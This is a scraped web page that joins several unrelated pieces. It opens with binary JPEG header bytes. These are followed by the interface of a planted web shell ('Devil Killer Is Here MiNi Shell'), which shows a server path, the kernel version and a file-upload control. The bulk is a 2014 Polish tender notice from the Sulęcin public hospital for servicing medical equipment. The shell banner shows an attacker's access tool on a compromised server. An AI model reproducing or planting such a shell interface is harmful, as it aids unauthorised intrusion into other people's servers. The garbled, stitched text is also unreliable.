JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141125/386106-N-2014.html

<p class="kh_header"><b>Sulęcin: Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku</b><br>
<b>Numer ogłoszenia: 386106 - 2014; data zamieszczenia: 25.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Witosa 7, 69-200 Sulęcin, woj. lubuskie, tel. 95 755 9500, faks 95 755 2157.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-sulecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku

1.Pod pojęciem okresowych przeglądów technicznych należy rozumieć:
a/ przeprowadzanie wszelkich czynności technicznych w tym procedur konserwacyjnych, w celu przywrócenia pełnej sprawności urządzeń wraz z wymianą części zużywalnych,
b/ przeprowadzenie niezbędnych pomiarów i testów,
c/ przygotowanie sprzętu do badań technicznych( rewizji) wykonywanych przez Urząd Dozoru Technicznego oraz udział w ich badaniach (jeżeli dotyczy),
d/dokonywanie wpisów do paszportów technicznych i kart technicznych napraw urządzeń o wykonaniu czynności, o sprawności urządzenia, o terminie następnego przeglądu oraz o  wynikach i kontroli bezpieczeństwa urządzenia ( załączyć do paszportu) zgodnie z Ustawą z dnia 20 maja 2010r. o wyrobach medycznych ( Dz.U. nr 107 poz. 679)
e/wystawianie orzeczeń o stanie technicznym urządzeń objętych umową.
Przeglądy okresowe będą wykonywane w oparciu o harmonogram przeglądów opracowany przez Zamawiającego wpisany do  poszczególnych pakietów stanowiących załącznik nr 1a do SIWZ.

2.Pod pojęciem napraw awaryjnych należy rozumieć:
a/ zlokalizowanie uszkodzenia,
b/ usunięcia niesprawności urządzenia poprzez wymianę lub naprawę uszkodzonych części,
c/sprawdzenie poprawności działania.
d/ dokonywanie wpisów do paszportów technicznych i kart technicznych napraw urządzeń o wykonaniu czynności, o sprawności urządzenia, o  wynikach i kontroli bezpieczeństwa urządzenia ( załączyć do paszportu) zgodnie z Ustawą z dnia 20 maja 2010r. o wyrobach medycznych ( Dz.U. nr 107 poz. 679)

Wykonawca zobowiązuje się podjąć czynności związane z usunięciem awarii niezwłocznie , nie póżniej jednak niż  w ciągu 24 godzin od chwili zgłoszenia telefonicznego, e-mailem  lub faxem.  Każdorazową interwencję serwisową Wykonawca odnotuje w paszporcie i karcie technicznej napraw urządzenia. Po usunięciu awarii( jeżeli jest to wymagane odrębnymi przepisami) Wykonawca jest zobowiązany zgłosić ten fakt w UDT w celu przeprowadzenia badania odbiorczego. Opłata za czynności wykonane przez UDT uregulowana zostanie przez Zamawiającego, na podstawie faktury wydanej przez ten Urząd. Potwierdzenie przyjęcia zlecenia Zamawiającego przesłanego do Wykonawcy ma nastąpić poprzez zwrotne potwierdzenie przyjęcie zgłoszenia  do realizacji w dowolnej wygodnej dla obu stron formie
( fax, email, telefon) uszczegółowionej w umowie. Wartość szacunkową naprawy należy każdorazowo przedłożyć przed rozpoczęciem robót do akceptacji Zamawiającemu.
3. Należność za wykonanie usunięcia awarii przedmiotu zamówienia będzie rozliczana każdorazowo po przedstawieniu faktury VAT lub rachunku zawierającego koszt usługi wraz z wyszczególnieniem zamontowanych części zamiennych, potwierdzonych kartą pracy lub raportem serwisowym zatwierdzonym przez przedstawiciela ( Dział Techniczny) Zamawiającego. 
4. W przypadku usługi usunięcia awarii, koszt robocizny będzie  iloczynem czasu wykonania usługi wynikającą z własnego cennika ( załączyć do oferty jako załącznik 1b) dla poszczególnych robót oraz  grup sprzętu i  stawki zryczałtowanej roboczogodziny ( wpisać do formularza ofertowego załącznik 1 do SIWZ) zawierającej wszystkie składowe takie jak: koszty pracy, koszty dojazdu, delegacji, noclegów itp.  
5. W przypadku okresowych przeglądów technicznych  koszt robocizny będzie zryczałtowaną kwotą zawierającą wszelkie składowe takie jak: koszty dojazdu, delegacji, noclegów, czynności konserwacyjne, naprawcze i pomiarowe, wystawienie certyfikatów itp.
6. Wszelkie używane w przedmiocie zamówienia materiały i części powinny być nowe i posiadać wymagane prawem aprobaty, dopuszczenia , certyfikaty i deklaracje właściwości użytkowych.
 7. Oferowany okres gwarancji należytego wykonania  oraz oferowany okres rękojmi za wady fizyczne całego zakresu prac stanowiących przedmiot zamówienia nie może być krótszy niż 12 miesięcy, liczony od dnia wystawienia raportu serwisowego lub karty pracy.
8. Wykonawca zobowiązany jest do wystawiania kart pracy i faktur dla każdego urządzenia oddzielnie.
9. Wykaz sprzętów i urządzeń medycznych  tzw. Paszportyzacja medyczna  2015r. z podziałem na  28 pakietów  stanowi załącznik nr 1a  do SIWZ. Wszelkie zmiany w ilości urządzeń medycznych, w przypadku kasacji starego sprzętu lub zakupu nowego sprzętu medycznego w okresie obowiązywania umowy z zachowaniem obowiązujących stawek  będą aktualizowane przez Zamawiającego  na bieżąco..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający zgodnie z art.  67.ust. 1 pkt 6 Ustawy PZP przewiduje możliwość udzielenia   w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług  zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, zgodnych  z przedmiotem zamówienia podstawowego;</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 23.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z oświadczeniem złożonym na załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenia, zamawiający żąda: Załączenia do oferty wykazu wykonania w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy- w tym okresie, co najmniej jednej usługi dotyczącej napraw i przeglądów sprzętów medycznych o wartości brutto analogicznej jak dla złożonej oferty i załączenia dokumentu potwierdzającego, że te usługi zostały wykonane, lub są wykonywane należycie.
oraz zgodnie z oświadczeniem złożonym na załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca dysponuje  odpowiednim potencjałem technicznym  zamawiający żąda:
Załączenia do oferty kserokopii  potwierdzonej za zgodność z oryginałem przez Wykonawcę, świadectwa kwalifikacyjnego E , wystawionego  zgodnie z przepisami rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r.  w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci Dz.U.nr 89.poz.828 i Nr 129 poz 1184 oraz z 2005r. Nr 141 poz 1189 przynajmniej  1  osoby  spełniającej wymagania kwalifikacyjne do wykonywania pracy na stanowisku  eksploatacji w zakresie konserwacji i remontów w Grupie I. ust. 2.  Urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1 kV.  
oraz zgodnie z oświadczeniem złożonym na załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca dysponuje  osobami zdolnymi do wykonania zamówienia zamawiający żąda:
Załączenia do oferty kserokopii ( potwierdzonej za zgodność z oryginałem przez Wykonawcę świadectwa kwalifikacyjnego E , wystawionego  zgodnie z przepisami rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r.  w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci Dz.U.nr 89.poz.828 i Nr 129 poz 1184 oraz z 2005r. Nr 141 poz 1189 przynajmniej  1  osoby  spełniającej wymagania kwalifikacyjne do wykonywania pracy na stanowisku  eksploatacji w zakresie konserwacji i remontów w Grupie I. ust. 2.  Urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1 kV.
oraz zgodnie z oświadczeniem złożonym na załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z oświadczeniem złożonym na załączniku nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta na formularzu ofertowym ( załącznik nr 1 i 1 a do SIWZ ),
Zaakceptowany wzór umowy ( załącznik nr 4 do SIWZ), 
Umowę regulującą współpracę podmiotów występujących wspólnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający będzie wymagał od wykonawcy, który złoży najkorzystniejszą ofertę, aby zawarł z nim umowę na takich warunkach jak we wzorze projekcie  umowy stanowiącej załącznik nr 4 do SIWZ. 
2. Realizacja umowy odbywać się będzie zgodnie z rzeczywistymi potrzebami zamawiającego.
3. Zamawiający dopuszcza zmiany w zawartej z Wykonawcą umowie w przedmiocie objętym postępowaniem tylko na zasadach określonych SIWZ tj. Strony dopuszczają zmiany umowy w zakresie:
a: zmiany stawek VAT, w terminie tj. w chwili wejścia w życie stosownych w tym zakresie aktów prawnych, 
b:zmiany w ilości urządzeń medycznych, w przypadku kasacji starego sprzętu lub zakupu nowego sprzętu medycznego w okresie obowiązywania umowy z zachowaniem obowiązujących stawek.
 c: zmiany w treści umowy mogą być dokonywane tylko w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-sulecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Sulęcinie 69-200 Sulęcin ul. W . Witosa 7 tel. 957552431 wew. 528 Dział Techniczny fax. 95 7552157 e-mail: zozsul@mp.pl...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2014 godzina 08:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Sulęcinie 69-200 Sulęcin ul. W . Witosa 7  w godz: od  07:30 do 15:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 9.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- pakiet nr 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 11.</p>
